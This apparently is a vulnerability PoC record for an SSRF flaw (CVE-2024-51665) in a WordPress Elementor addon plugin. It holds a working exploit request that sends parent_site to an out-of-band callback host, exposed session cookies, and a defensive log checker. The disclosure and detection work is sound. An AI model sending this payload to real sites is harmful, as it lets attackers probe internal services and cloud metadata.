POC details: bdf12432250d01cca311817da215eab9387b7de9

Source
Related vulnerability
Title: WordPress plugin Magical Addons For Elementor code issue vulnerability (CVE-2024-51665)
Description: WordPress and WordPress plugins are products of the WordPress Foundation. WordPress is a blogging platform developed in PHP; it supports hosting a personal blog site on a server running PHP and MySQL. A WordPress plugin is an application plugin. The WordPress plugin Magical Addons For Elementor in version 1.2.1 and earlier contains a code issue vulnerability. An attacker can exploit this vulnerability to carry out a server-side request forgery attack.
Description
Magical Addons For Elementor <= 1.2.1 - Authenticated (Subscriber+) Server-Side Request Forgery
Introduction
# CVE-2024-51665
Magical Addons For Elementor <= 1.2.1 - Authenticated (Subscriber+) Server-Side Request Forgery

# Description:
The Magical Addons For Elementor ( Header Footer Builder, Free Elementor Widgets, Elementor Templates Library ) plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to make web requests to arbitrary locations originating from the web application which can be used to query and modify information from internal services.

```
CVE: CVE-2024-51665
CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
CVSS Score: 6.4
Slugs: magical-addons-for-elementor
```

POC
---

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Cookie: wordpress_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1731408607%7CmiG195bwGw9U0MCeugmpqKixxK2Y5xcpwWpLTeKrE5N%7C4da380106f854d896c9d58cf609bf00c508c045357a73fbc0c5ea3e2d4925573; _delighted_web={%22FutSOUgy5edCcTk9%22:{%22_delighted_fst%22:{%22t%22:%221694595337803%22}}}; mailpoet_page_view=%7B%22timestamp%22%3A1727811617%7D; wordpress_admin_logged_in=1; LUMISESESSID=TE3CYBG1VFQEDZU5QXW7; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; tk_ai=woo%3A4etnnSH4LBZewXIFkJECnLd0; PHPSESSID=786ef110eb080f5686818c346edde8d3; wp-settings-time-4=1731070503; sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2024-11-08%2017%3A21%3A02%7C%7C%7Cep%3Dhttp%3A%2F%2Fkubernetes.docker.internal%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2024-11-08%2017%3A21%3A02%7C%7C%7Cep%3Dhttp%3A%2F%2Fkubernetes.docker.internal%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D4%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010.15%3B%20rv%3A132.0%29%20Gecko%2F20100101%20Firefox%2F132.0; woocommerce_items_in_cart=1; woocommerce_cart_hash=6d1d20e1fd5e4f4f3846eea4a6c448f3; wp_woocommerce_session_e2df32a6c3e7076dd7dc7d3f3fec39aa=1%7C%7C1731322046%7C%7C1731318446%7C%7C1878869e68ff1672506462f9d2b69bb9; wp_masteriyo_session_e2df32a6c3e7076dd7dc7d3f3fec39aa=1%7C%7C1731344010%7C%7C1731340410%7C%7C438a61e5a677a01984451f5aca4a5945; wordpress_logged_in_e2df32a6c3e7076dd7dc7d3f3fec39aa=admin%7C1731408607%7CmiG195bwGw9U0MCeugmpqKixxK2Y5xcpwWpLTeKrE5N%7C5a938f0f09db5c9aff66b41764f880910ac3f0232da95a6b9436a266b3e84e27; wp-settings-1=m02pzb9ihm%3Dundefined%26libraryContent%3Dbrowse; wp-settings-time-1=1731235808
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Type: application/x-www-form-urlencoded
Content-Length: 97

action=magical_addon_import_template&id=1&parent_site=suvjjaixwwfhtvhfbtjikrp9sk6je4edb.oast.fun/
```

```
HTTP/1.1 200 OK
Date: Sun, 10 Nov 2024 12:00:47 GMT
Server: Apache/2.4.57 (Debian)
X-Powered-By: PHP/8.2.13
X-Robots-Tag: noindex
X-Content-Type-Options: nosniff
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private
Referrer-Policy: strict-origin-when-cross-origin
X-Frame-Options: SAMEORIGIN
Content-Length: 4
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

null
```
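As an added detection illustration (not part of the POC and not the plugin's own code): a checker that takes admin-ajax request records and flags the `magical_addon_import_template` action whenever `parent_site` points anywhere other than an allow-listed template host, reporting private or link-local IP targets separately. The allow-list host, the (path, body) record format and the sample records are assumptions; ordinary access logs do not contain POST bodies, so in practice the records would come from a WAF or ModSecurity audit log.

```python
import ipaddress
from urllib.parse import parse_qs, urlsplit

VULN_ACTION = "magical_addon_import_template"
# Hypothetical allow-list: the only host(s) this site should ever import
# templates from. Any other parent_site is reported.
ALLOWED_PARENT_HOSTS = {"templates.example.com"}

# Constructed admin-ajax records as (request path, POST body). The first
# body is the one from the POC above; the rest are made up for contrast.
SAMPLE_REQUESTS = [
    ("/wp-admin/admin-ajax.php",
     "action=magical_addon_import_template&id=1"
     "&parent_site=suvjjaixwwfhtvhfbtjikrp9sk6je4edb.oast.fun/"),
    ("/wp-admin/admin-ajax.php",
     "action=magical_addon_import_template&id=2&parent_site=http://169.254.169.254/"),
    ("/wp-admin/admin-ajax.php",
     "action=magical_addon_import_template&id=3&parent_site=https://templates.example.com/"),
    ("/wp-admin/admin-ajax.php", "action=heartbeat&_nonce=deadbeef"),
]


def parent_site_host(raw):
    """Extract the host from parent_site; the POC value has no scheme."""
    if "://" not in raw:
        raw = "http://" + raw
    return (urlsplit(raw).hostname or "").lower()


def check_request(path, body):
    """Return a finding dict for a suspicious import_template call, else None."""
    if not path.startswith("/wp-admin/admin-ajax.php"):
        return None
    params = parse_qs(body, keep_blank_values=True)
    if params.get("action", [""])[0] != VULN_ACTION:
        return None
    parent = params.get("parent_site", [""])[0]
    host = parent_site_host(parent)
    if host in ALLOWED_PARENT_HOSTS:
        return None
    try:  # literal IP target: call out RFC1918/loopback/link-local ranges
        reason = "internal-address" if ipaddress.ip_address(host).is_private else "unlisted-host"
    except ValueError:  # a hostname rather than an IP literal
        reason = "unlisted-host"
    return {"action": VULN_ACTION, "parent_site": parent, "host": host, "reason": reason}


def scan(records):
    """Run check_request over (path, body) records and keep the findings."""
    return [f for f in (check_request(p, b) for p, b in records) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(finding)
```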